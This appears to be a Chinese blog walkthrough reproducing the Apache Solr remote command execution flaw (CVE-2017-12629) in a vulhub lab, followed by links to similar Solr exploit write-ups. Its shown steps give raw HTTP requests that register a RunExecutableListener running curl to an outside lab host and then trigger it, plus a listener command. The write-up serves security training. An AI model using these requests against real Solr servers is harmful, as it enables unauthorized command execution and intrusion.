vulhub-Solr

最新推荐文章于 2024-12-12 22:22:14 发布
最新推荐文章于 2024-12-12 22:22:14 发布
阅读量339 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xmd213131/article/details/107880752
版权

文章目录

Apache Solr 远程命令执行漏洞(CVE-2017-12629)

使用postCommit测试

1.第一次命令执行我们需要创建一个listener

GET /solr/demo/config HTTP/1.1
Host: 192.168.100.129:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 176

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"curl","dir":"/usr/bin/","args":["http://192.168.100.205:6666/test1"]}}

2.然后在我们的服务端启动一个简单的服务

python2 -m SimpleHTTPServer 6666

3.我们在update接口下激活我们的listener

POST /solr/demo/update HTTP/1.1
Host: 192.168.100.129:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 14

[{"id":"123"}]

这里的id是什么没有影响,其作用在于激活我们创建的listener

访问到了我们的服务器:
在这里插入图片描述

4.再次命令执行,这时候不能使用add-listener了,而要使用update-listener

使用add-listener的效果:

最低0.47元/天 解锁文章
[ vulhub漏洞复现篇 ] solr 远程命令执行(CVE-2019-0193)
qq_51577576的博客
12-08 702
[ vulhub漏洞复现篇 ] solr 远程命令执行(CVE-2019-0193) 此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558)
qq_51577576的博客
12-09 875
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558) Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离。 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。
Vulhub漏洞复现---solr---CVE-2019-17558
weixin_74942037的博客
11-16 1073
Velocity模板可以通过configset ’ Velocity / '目录中的Velocity模板或作为参数提供。用户定义的configset可以包含可呈现的、潜在的恶意模板。参数提供的模板在默认情况下是禁用的,但是可以通过设置params.resource.loader来启用。定义响应编写器需要配置API访问。Solr 8.4完全删除了params资源加载器,只有在configset是“可信的”(由经过身份验证的用户上传)时才启用configset提供的模板呈现。配置未打开,无法使用自定义模板。
vulhub漏洞复现64_Solr
weixin_44193247的博客
02-12 889
vulhub漏洞复现练习篇
Vulhub——Log4j、solr
qq_55202378的博客
06-17 1422
同样需要先创建core,这次是在将。
vulhub中Apache Solr 远程命令执行漏洞复现(CVE-2019-0193)
yougexiaojiuguan的博客
04-04 1040
漏洞复现过程的记录
vulhub复现CVE-2021-44228log4j漏洞
最新发布
weixin_48878440的博客
12-12 1057
vulhub复现cve-2021-44228 log4j漏洞
vulhub漏洞—Apache_Solr_RemoteStreaming文件读取与SSRF漏洞
weixin_45808483的博客
12-17 454
漏洞描述 Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。 影响范围 Apache Solr <= 8.8.1 复现过程 漏洞环境 vulhub搭建:https://github.com/vulhub/vulhub/blob/master/solr/Remote-Streaming-Fileread/README.zh-cn.md 执行如下命令启动solr 8.8.1:
vulhub】Apache Solr 远程命令执行漏洞(CVE-2017-12629)复现
qq_45300786的博客
09-15 2113
特征 访问8983端口即可查看到Apache solr的管理页面,无需登录。(可能换端口) 网站title是Solr Admin,图标有点像一朵红色的花 影响版本 Apache Solr 5.5.0到7.0.1版本 漏洞利用 此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。 https://paper.seebug.org/425/ 这里我看了下vulhub官方的文档,首先创建一个listener
[Vulfocus解题系列] Apache Solr 远程命令执行漏洞(CVE-2017-12629)
00勇士王子的博客
01-05 2440
介绍 影响版本 Apache Solr 5.5.0到7.0.1版本 复现过程 docker搭建 Apache Solr 环境 burp抓包 改包 POST /solr/demo/config HTTP/1.1 Host:ip:8983 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,appli
[Vulfocus解题系列]Apache Solr 远程命令执行漏洞(CVE-2019-0193)
00勇士王子的博客
01-06 1043
介绍 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。 靶场搭建 进入指定漏洞路径,执行命令 docker-c
Apache solr XML 实体注入漏洞(CVE-2017-12629)
黑白的博客
11-22 1011
声明 好好学习,天天向上 漏洞描述 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。 影响范围 Apache Solr < 7.1 A
【漏洞复现】Apache系列(二)之Solr漏洞复现
qq_45244158的博客
03-01 8422
【漏洞复现】Apache系列(二)之Solr漏洞复现
【vulfocus漏洞复现-初级】solr 代码执行 (CVE-2019-12409)
ll_515的博客
01-20 2538
Apache Solr受影响的版本8.1.1和8.2.0在solr.in.sh配置文件中默认开启了ENABLE_REMOTE_JMX_OPTS配置项,即允许远程加载JMX,导致可远程代码执行。
Apache Solr 远程命令执行漏洞(CVE-2017-12629)
黑白的博客
11-22 2665
声明 好好学习,天天向上 漏洞描述 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。 本环境测试RCE漏洞。 影响范围 Apache Sol
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
m0_48520508的博客
02-19 1196
0x00简介 Solr 是一个开源的企业级搜索服务器,底层使用易于扩展和修改的Java 来实现。服务器通信使用标准的HTTP 和XML,所以如果使用Solr 了解Java 技术会有用却不是必须的要求。 Solr 主要特性有:强大的全文检索功能,高亮显示检索结果,动态集群,数据库接口和电子文档(Word ,PDF 等)的处理。而且Solr 具有高度的可扩展,支持分布搜索和索引的复制。 0x01漏洞概述 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助Velocity
vulfocus——solr远程命令执行(CVE-2019-17558)
m0_62063669的博客
09-11 1037
Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。Velocity是一个基于Java的模板引擎,可以通过特定的语法获取在java对象的数据,填充到模板中,从而实现界面和java代码的分离。2.访问页面默认会有一个叫demo的core。4.注入Velocity模板即可执行任意命令。
【漏洞复现-solr-命令执行】vulfocus/solr-cve_2019_17558
10-15 2538
solr-命令执行】接口、配置文件
mmseg4j-solr最新版本2.0.0及其核心组件发布
综合以上信息,我们可以看出mmseg4j-solr-2.0.0-with-mmseg4j-core.zip文件提供了一个针对Solr搜索引擎的中文分词解决方案。这个解决方案的核心包括了两个jar包,一个是功能强大的mmseg4j-core分词库,另一个是为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值